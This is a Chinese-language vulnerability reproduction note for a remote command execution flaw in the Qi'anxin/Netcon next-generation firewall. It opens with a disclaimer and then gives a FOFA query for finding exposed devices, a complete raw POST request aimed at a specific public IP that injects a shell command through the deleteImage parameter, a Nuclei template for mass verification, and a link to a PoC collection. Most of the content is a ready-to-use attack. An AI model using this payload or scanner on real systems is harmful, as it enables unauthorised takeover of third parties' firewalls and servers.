免责声明:

本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!

漏洞描述

奇安信网康下一代防火墙(NGFW)是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙,存在远程命令执行,通过漏洞攻击者可以获取服务器权限。

fofa语句

app="网康科技-下一代防火墙"

漏洞复现

打开页面

1705893352827.png

构造payload

1705893445587.png

POST /directdata/direct/router HTTP/1.1
Host: 58.213.117.66:8443
Cookie: PHPSESSID=m9o5p5o37rcqe2sto7mqm5ej82; ys-active_page=s%3A
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 163

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;id >/var/www/html/changge.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

查看页面

1705893495404.png

nuclei批量验证

1705893530450.png

id: WangKang-NGFW-RCE

info:
  name: 网康科技-下一代防火墙存在任意命令执行漏洞
  author: changge
  severity: critical
  description: 奇安信网康下一代防火墙(NGFW)是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙,存在远程命令执行,通过漏洞攻击者可以获取服务器权限。
  metadata:
    max-request: 1
    fofa-query: body="app/feature/portForwarding.js" || body="app/app.translate-config.js"
    verified: true
variables:
  file_name: "{{to_lower(rand_text_alpha(6))}}.txt"
requests:
  - raw:
      - |-
        POST /directdata/direct/router HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
        Host: {{Hostname}}

        {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;id >/var/www/html/{{file_name}}"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

      - |+
        GET /{{file_name}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

    matchers:
      - type: dsl
        dsl:
          - 'contains((body_2), "uid") && status_code_2 == 200' 

github poc总汇地址:

https://github.com/AYcg/poc